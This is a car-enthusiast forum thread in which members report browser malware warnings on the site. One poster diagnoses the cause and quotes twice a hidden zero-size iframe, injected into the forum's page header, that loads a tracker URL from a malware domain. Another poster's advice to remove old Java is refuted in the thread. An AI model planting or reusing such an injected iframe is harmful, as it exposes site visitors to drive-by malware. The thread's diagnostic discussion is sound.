Virus whe visiting the site?

Status
Not open for further replies.

PetrolAholic

Reaction score
Hi all, I use Google Chromeweb browser from time to time and when I visited the site on it I get this message:

Warning: Something's Not Right Here!
Untitled Document contains content from ajkqqw.co.cc, a site known to distribute malware. Your computer might catch a virus if you visit this site.

Google has found malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.
Just wondering if anyone else gts this when they visit? I'm using Internet Explorer at the moment but my anti vrus software detects:​

08/03/2011 08:15:41 RelevantKnowledge Web Anti-Virus Packed:​

Anyone els get this or is it just me?

Last edited:
oops.... Had a look in this section and couldt see anything, only just started happening so thought it was something "new"

This happened to me (at work...) yesterday. Site was down all yesterday evening too. Sounds like malicious code but I don't think it's a 'virus'.

I suspect it's the jealous people from the Ford-Fiesta owners club...

This happened to me (at work...) yesterday. Site was down all yesterday evening too. Sounds like malicious code but I don't think it's a 'virus'.

I suspect it's the jealous people from the Ford-Fiesta owners club...

You need to go to java website download the latest version, also you need to remove java enviroment 2.41v from add and remove programs (xp) or programs and features (vista or Windows 7).

Once you have update and removed the old version google and anti virus will not pick it up as being a virus, it is just a coding problem which is fixed by doing the above.

If you need help with the above here is a link to javas website: Why should I remove older versions of Java from my system?

It's caused by this iframe at the top of each page removing/upgrading java etc isn't going to fix it they need to find out what caused it and patch it, I see that they have upgraded the forum to vBulletin 4.1.2 overnight but this still needs to be removed from the header template or an offending plugin which has got into the vb loop.

<iframe src="http://ajkqqw.co.cc/tracker/?token=4430F2F6463811E0AD50A2DFE1E63F12&source=default&sub=1" width="0" height="0" frameborder="0"></iframe>

It's caused by this iframe at the top of each page removing/upgrading java etc isn't going to fix it they need to find out what caused it and patch it, I see that they have upgraded the forum to vBulletin 4.1.2 overnight but this still needs to be removed from the header template or an offending plugin which has got into the vb loop.

<iframe src="http://ajkqqw.co.cc/tracker/?token=4430F2F6463811E0AD50A2DFE1E63F12&source=default&sub=1" width="0" height="0" frameborder="0"></iframe>

Ahh site works fine on my iPhone lol. Tried removing java as suggested an didn't work. It's more of an annoyance than anything!!!

Same ^^ iPhones fine but site says virus problems, it was down a day back ? Said down too malware or something threats within the forum.

So what else can we do to enable the site if it's safe ??

Avast has kept me off of audi-sport for 2 days :(
Malware detected or something.
Does site have a twitter page? I hashtagged "audi-sport" for some info but nothing found.

I emailed the hosts of that particular domain, and they've suspended it. So anyone who was getting warnings, they should start to die down. The admins still need to take some action to remove the actual exploit code from the top of the forum and to get themselves removed from Google's blacklist, but it should actually be safe to visit again now.

edit - I see they allow guest posts (i.e. from me!), so I wonder if that's how the exploit has got in, some kind of vulnerability in vB exploited by a random guest user (or even automated bot) who hasn't had to login and pass any kind of humanity tests...

Status
Not open for further replies.